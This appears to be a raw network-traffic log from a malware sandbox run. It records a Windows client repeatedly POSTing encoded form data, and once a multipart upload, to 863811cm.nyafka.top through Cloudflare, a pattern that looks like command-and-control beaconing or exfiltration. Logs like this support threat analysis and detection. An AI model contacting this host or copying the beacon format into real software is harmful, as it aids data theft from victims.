                                                                Oct 11, 2024 01:36:40.786123991 CEST1992OUTData Raw: 55 5e 58 5e 51 58 58 55 5e 5a 55 58 51 55 5a 58 57 5f 58 5f 55 5c 51 5c 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: U^X^QXXU^ZUXQUZXW_X_U\Q\XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:<>(]>*,13+%'#8?+3%!40=V=; @5!=+#Y$/\*)
                                                                Oct 11, 2024 01:36:41.081494093 CEST746INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:41 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nTBpE%2BdCNBJxdjl1t0cNP8P4hQgJtf1BrI8VFCuLVGId2z920bQc1QkgH4jiKi%2BLYNhK58lhcZfcWwqAChvtVVDrzI8aduFFN2UWU8HmzfdldexS71HgLC7%2FONp%2BIk5gB2TSWhBr"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f169d758c1b-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 5d 28 2a 31 0e 34 3e 0e 04 2c 31 20 59 2a 5b 39 07 3c 22 34 02 31 1d 3c 04 2c 2c 04 0d 36 38 30 5c 3e 05 2e 1c 27 3c 01 11 2b 31 2a 51 03 1b 39 5f 3f 1d 0e 08 28 1c 21 5c 3f 1c 2d 1a 24 0a 25 08 3d 13 3e 08 24 10 2e 59 35 57 38 1c 3d 2c 01 52 2c 38 30 18 3e 3b 22 10 21 2b 2a 5f 08 13 3a 09 28 28 37 0f 35 27 35 58 36 03 1a 0f 36 07 0b 09 3d 29 03 09 25 23 38 5e 2f 32 0e 13 20 3f 27 1d 36 2c 31 0c 23 13 34 5b 27 28 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98'](*14>,1 Y*[9<"41<,,680\>.'<+1*Q9_?(!\?-$%=>$.Y5W8=,R,80>;"!+*_:((75'5X66=)%#8^/2 ?'6,1#4['("_")Q?TR0
                                                                Oct 11, 2024 01:36:41.192003965 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2004
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:41.286644936 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:41.286803961 CEST2004OUTData Raw: 55 59 58 5e 54 5b 58 5e 5e 5a 55 58 51 56 5a 5c 57 5f 58 5f 55 5c 51 5e 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: UYX^T[X^^ZUXQVZ\W_X_U\Q^XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9Y(><?/W2-'*57") )T44 $1=8;51(X(;#Y$/\*-
                                                                Oct 11, 2024 01:36:41.543111086 CEST739INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:41 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4WRFnK5YNobPLKwUFHt%2BFmoqUqOisTu%2FcoZ5RL4RVHda9kjQxWWZoZV2kzRccdrqmWLYqVnQfYPpQ6JIXd7XRBB60kDrtUEvSlUvZjPo7riIRi0Lo2dggOx1cVAPJsiHw1Gd6Y%2B5"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f19ba4c8c1b-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 24 07 2a 39 2a 57 22 2e 2f 1f 38 31 28 5a 2a 5b 3e 5f 3f 0f 01 59 25 37 3b 15 2c 2f 21 57 22 38 2c 17 3d 05 35 01 24 2f 3b 12 2b 1b 2a 51 03 1b 39 13 28 30 30 0d 3f 0b 2d 5b 29 32 03 5e 33 23 14 1c 3d 04 3d 1f 30 3d 2d 06 21 31 3f 0b 3d 2f 27 1f 2f 05 34 1b 28 3b 26 58 23 2b 2a 5f 08 13 39 57 2a 16 3f 0e 36 19 0b 59 23 2e 3b 10 36 3a 39 0b 3f 39 0c 51 24 30 33 04 2c 54 3f 00 23 3c 2c 0c 21 02 31 0b 20 3d 30 5c 26 28 22 5f 22 00 29 51 00 3f 54 52 0d 0a
                                                                Data Ascii: 98$*9*W"./81(Z*[>_?Y%7;,/!W"8,=5$/;+*Q9(00?-[)2^3#==0=-!1?=/'/4(;&X#+*_9W*?6Y#.;6:9?9Q$03,T?#<,!1 =0\&("_")Q?TR
                                                                Oct 11, 2024 01:36:41.677723885 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Oct 11, 2024 01:36:41.695489883 CEST310OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 540
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:41.790795088 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:41.791059971 CEST540OUTData Raw: 55 5d 58 58 51 5f 58 54 5e 5a 55 58 51 51 5a 59 57 5c 58 59 55 50 51 53 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: U]XXQ_XT^ZUXQQZYW\XYUPQSXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9Y+-7<*R13(,X#;((U5T#(3-**(#5$>;#Y$/\*1
                                                                Oct 11, 2024 01:36:42.044852018 CEST593INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:41 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=epfrQNRZ9fklQVoaToiW4KhfroXRJg%2FIqXf9UJPTRnIpchuywLGR1IEkIXy8jUB9QpUYXFBhr5Yo1oOXrpClbjlJ1OiKaqGaKyL%2BgoSKRiRMzUvyFZdhg7U09Bc6NDksxxwWx7aH"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f1ceec48c1b-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0
                                                                Oct 11, 2024 01:36:42.045912027 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 1984
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:42.140520096 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:42.140722990 CEST1984OUTData Raw: 55 5d 58 5d 54 5a 58 5f 5e 5a 55 58 51 51 5a 5b 57 5d 58 54 55 54 51 5e 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: U]X]TZX_^ZUXQQZ[W]XTUTQ^XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9]< Z+9 2-$E+/5;[?%4'#P&.%*( F6();#Y$/\*1
                                                                Oct 11, 2024 01:36:42.438457012 CEST746INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:42 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uCErSundvHdbn1qDQjynGXJU30fOggFMp%2FJULUApDXxkkjDibcDNGd5ZFCc0Vt%2FeQqid%2FnBxggEvC1J7aVCYGIHYqUrl8lAGiZ9W6qkg%2FQbchs5zBIebaeZXxjvLPNlsKV1ETfBl"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f1f19788c1b-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 16 28 29 3d 0c 37 07 33 11 3b 0f 20 1d 29 5b 32 58 2b 1f 38 00 32 24 3f 5f 2d 5a 21 52 21 15 33 05 29 2c 26 5f 33 2c 01 5b 2b 0b 2a 51 03 1b 39 5e 3f 23 0e 08 3f 1c 21 5e 3f 0c 39 5c 27 1d 18 1c 3e 3d 3d 1d 33 00 26 58 21 0f 27 0b 2a 05 2f 1d 2c 3b 20 1a 2a 3b 21 00 21 3b 2a 5f 08 13 39 1d 28 28 23 0f 20 37 29 59 36 04 38 0f 20 39 21 0e 3e 17 26 1c 27 30 2f 05 2f 32 06 13 34 3f 0d 54 36 02 2e 1e 20 5b 34 58 32 28 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98'()=73; )[2X+82$?_-Z!R!3),&_3,[+*Q9^?#?!^?9\'>==3&X!'*/,; *;!!;*_9((# 7)Y68 9!>&'0//24?T6. [4X2("_")Q?TR0
                                                                Oct 11, 2024 01:36:42.438755035 CEST346OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=----iXBE9x7sAZ9s8LIMWmsWdYRkexiMsvuP81
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 3014
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:42.533309937 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:42.789637089 CEST591INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:42 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mS7Xrh03jyziJ0Vx1rAU8aK3ER7Qbm575iQKUFvwqIhoEbLo0LEQIP3i6FG0lYK3%2BbweQF84ZH0Nh6IwMW9dF9Io25paBrE8LqOoLa5Dg5dHY4bCeYlsmLXeKGVRy724S6R28DN9"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f218c5f8c1b-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0
                                                                Oct 11, 2024 01:36:42.790411949 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 1972
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:42.884583950 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:43.144416094 CEST748INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:43 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r2CvOG%2F%2FP67sBtMT353RLueXjq4eDfpCTmIwnrxtN2zzZ4QQbc%2FXRVrLkJSxcklALy29E9j8pYpePi9JjO%2FN%2BToRoAdMdebyr4ZzoLokzXdep70SqxP7KbpKq02HmQjpC9xuRV6T"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f23bf0d8c1b-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 16 2a 29 00 55 20 2d 30 01 2d 21 23 01 3d 13 2a 15 28 21 38 06 25 37 3b 58 2e 12 3d 11 22 3b 09 07 28 2c 0c 5e 26 2c 3b 5a 28 31 2a 51 03 1b 39 58 3f 1d 01 1c 3c 31 3a 02 2b 31 31 5d 33 0a 3e 1a 29 2d 00 0c 30 3d 39 01 23 21 28 52 2a 05 24 0f 38 38 33 41 3d 2b 25 03 23 3b 2a 5f 08 13 39 13 3d 28 2c 57 20 27 3e 06 21 04 37 54 22 07 2d 0b 2a 07 22 1c 27 0d 0a 5d 38 0c 20 5f 20 06 23 1c 36 05 21 0b 23 13 34 59 25 38 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98'*)U -0-!#=*(!8%7;X.=";(,^&,;Z(1*Q9X?<1:+11]3>)-0=9#!(R*$883A=+%#;*_9=(,W '>!7T"-*"']8 _ #6!#4Y%8"_")Q?TR0
                                                                Oct 11, 2024 01:36:43.261251926 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 1984
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:43.355474949 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:43.659668922 CEST748INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:43 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PUZ7XaCjqxn8hjKZ4Jlq86%2F%2F33XMjsBkuoT%2BY7JqoE%2BDNfM2NRUXxWG2pUQLhzwUHgFJWYN2AnIKxBVSjNRaYwRRSN%2FWjIiWBCngR4MHF4jJJVZ9hyikG7kca4gEYcm7EoOP4Hjh"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f26ab0f8c1b-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 24 05 2a 39 0c 1d 34 10 23 1f 38 31 28 59 3d 5b 2e 5d 3c 21 0e 07 25 1d 37 59 2e 12 21 56 36 05 0d 06 2a 3c 2e 13 26 3c 01 5b 3c 31 2a 51 03 1b 39 5b 2b 20 2f 56 2b 22 07 5b 3f 32 3d 5e 30 0a 39 08 29 13 31 55 25 2e 2d 04 22 57 37 0c 2a 3f 27 1f 38 02 3f 41 2a 16 0c 58 34 01 2a 5f 08 13 3a 0d 3e 06 2c 56 20 37 08 04 36 3d 33 54 35 07 29 0b 3f 39 3a 1e 33 0d 3c 5f 3b 54 24 58 37 59 2b 51 36 05 36 57 34 3d 24 11 25 02 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98$*94#81(Y=[.]<!%7Y.!V6*<.&<[<1*Q9[+ /V+"[?2=^09)1U%.-"W7*?'8?A*X4*_:>,V 76=3T5)?9:3<_;T$X7Y+Q66W4=$%"_")Q?TR0
                                                                Oct 11, 2024 01:36:43.770101070 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 1984
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:43.864298105 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:44.167305946 CEST744INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:44 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WLB67P3cLAACm6MlXYuynBzAFi4yvLgTENNovpfy1afSdbZZII7HzxHaV1hYpk7XP5qeUOn%2F5DqgZ8Mpi8aZAgcyKMXWVXzyUk1S7%2FjaK9w1c7rdNa%2BJmiVHznonABNHKxOfMAcm"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f29df208c1b-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 5c 3d 29 3e 10 22 3e 2c 00 2c 0f 38 5b 2a 04 3d 06 3f 0f 27 5b 31 1d 3b 14 3a 02 07 1f 23 3b 01 00 2a 2c 2e 12 27 5a 3b 5d 3c 21 2a 51 03 1b 3a 00 3c 1d 28 0f 28 32 2a 06 2b 0c 2d 1a 26 33 3d 08 2a 3d 2a 09 30 3e 31 00 21 0f 28 55 3d 2c 24 0d 38 28 34 1c 3d 06 31 04 37 3b 2a 5f 08 13 39 55 29 3b 3c 1e 35 37 0f 5d 36 03 3f 10 21 2a 26 1a 3d 39 2a 54 24 1d 01 06 3b 54 3b 02 23 11 0d 50 35 12 25 0d 23 3e 20 58 27 38 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98'\=)>">,,8[*=?'[1;:#;*,.'Z;]<!*Q:<((2*+-&3=*=*0>1!(U=,$8(4=17;*_9U);<57]6?!*&=9*T$;T;#P5%#> X'8"_")Q?TR0
                                                                Oct 11, 2024 01:36:44.270144939 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 1984
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:44.364566088 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:44.663569927 CEST746INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:44 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GteMv6JDkxYbmQDqf7jz7Emd%2Fq%2BJspfW6Kr9TN04nNYWpfg1te7tmQCt5EN9C1a1tefcQFh9BsszqXgEVwVmWZNlPU10Tj8tJqfL3DKU%2B6bUPruTUxVfUB1X%2Bf5OK18zxJgRXYHG"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f2cfb058c1b-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 24 07 3e 17 39 0c 23 58 2f 12 2c 32 24 58 29 03 3a 59 28 31 09 13 25 24 2b 59 2e 3c 25 11 21 3b 02 58 3e 05 32 12 30 12 05 5a 3f 0b 2a 51 03 1b 39 5e 2b 30 24 09 2b 0b 39 14 28 1c 03 1a 24 33 13 40 3d 04 32 08 30 00 32 58 21 08 23 0f 29 5a 3b 57 38 28 33 44 3e 01 3e 5a 21 3b 2a 5f 08 13 3a 0f 2a 38 01 0c 20 24 35 14 23 2d 23 53 36 3a 25 0b 3d 39 2a 57 27 23 2b 04 2f 1c 2b 00 37 11 20 0c 21 2c 32 56 37 03 23 05 27 38 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98$>9#X/,2$X):Y(1%$+Y.<%!;X>20Z?*Q9^+0$+9($3@=202X!#)Z;W8(3D>>Z!;*_:*8 $5#-#S6:%=9*W'#+/+7 !,2V7#'8"_")Q?TR0
                                                                Oct 11, 2024 01:36:44.770215034 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 1984
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:44.864643097 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:45.179203987 CEST750INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:45 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T1XdPF2Js2VP5nsgiY57uonANiUpAApg25EVAIbYWYBov6VdADJhmTklynuE8srdjzgU4U0Frl3YWdr3yomGXsgH%2Bw%2Bm%2FEA%2Fk3NOrVB%2FRCr1d0DVtcf6TM%2BGpKBkKYYwSxQa637t"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f301f778c1b-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 5c 3e 3a 22 1e 34 07 33 5d 2c 31 3f 07 29 03 0f 00 28 31 28 01 31 1d 2b 15 2d 12 26 0f 36 05 28 17 2a 02 2e 11 33 3c 34 03 2b 0b 2a 51 03 1b 39 1c 28 33 20 08 28 22 2a 02 28 0c 00 04 27 1d 29 42 2a 3d 3e 0c 30 3d 22 16 36 32 3c 57 3e 02 28 0e 2c 05 2f 43 2a 28 32 10 23 3b 2a 5f 08 13 39 1d 2a 16 20 50 22 37 2e 04 36 2e 27 1d 35 39 0b 09 2a 00 22 51 27 33 38 5f 2c 0b 34 12 20 3f 37 57 22 3c 26 1e 20 2e 2f 02 32 28 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98'\>:"43],1?)(1(1+-&6(*.3<4+*Q9(3 ("*(')B*=>0="62<W>(,/C*(2#;*_9* P"7.6.'59*"Q'38_,4 ?7W"<& ./2("_")Q?TR0
                                                                Oct 11, 2024 01:36:45.288573027 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2004
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:45.384085894 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:45.660372019 CEST748INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:45 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q2i%2BRdh74tXxiNnAGZe%2F0JW8txivA446POUm5flImRZzKbYlRYFhMakEyUY5h7ZyW9B1fCogWCgL9%2BE4Blwf0rVyYFqPlLYVJrDCljIKTyhjZS%2Bpf%2FmVpog4j2m38SGY5UH7I9FD"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f335bff8c1b-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 5c 2a 17 2e 53 37 3e 33 5c 3b 0f 02 13 2a 2d 29 06 2b 57 27 1d 25 34 15 5d 39 3c 08 0b 35 3b 02 5d 29 12 0f 06 24 05 2f 12 28 31 2a 51 03 1b 39 5b 28 0a 2f 51 28 21 35 16 28 22 0f 5d 27 33 29 45 29 13 3d 56 24 2e 3d 00 36 0f 20 1e 29 02 3b 1d 38 28 2b 45 2a 16 2a 5a 20 3b 2a 5f 08 13 39 1e 29 28 0a 1c 22 09 29 5c 35 03 33 1e 20 39 00 14 3f 2a 21 09 27 33 0e 15 38 0c 2c 1d 23 11 2f 57 23 3c 04 10 37 5b 2b 02 26 12 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98'\*.S7>3\;*-)+W'%4]9<5;])$/(1*Q9[(/Q(!5("]'3)E)=V$.=6 );8(+E**Z ;*_9)(")\53 9?*!'38,#/W#<7[+&"_")Q?TR0
                                                                Oct 11, 2024 01:36:45.770354986 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2004
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:45.865756035 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:46.167243958 CEST746INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:46 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
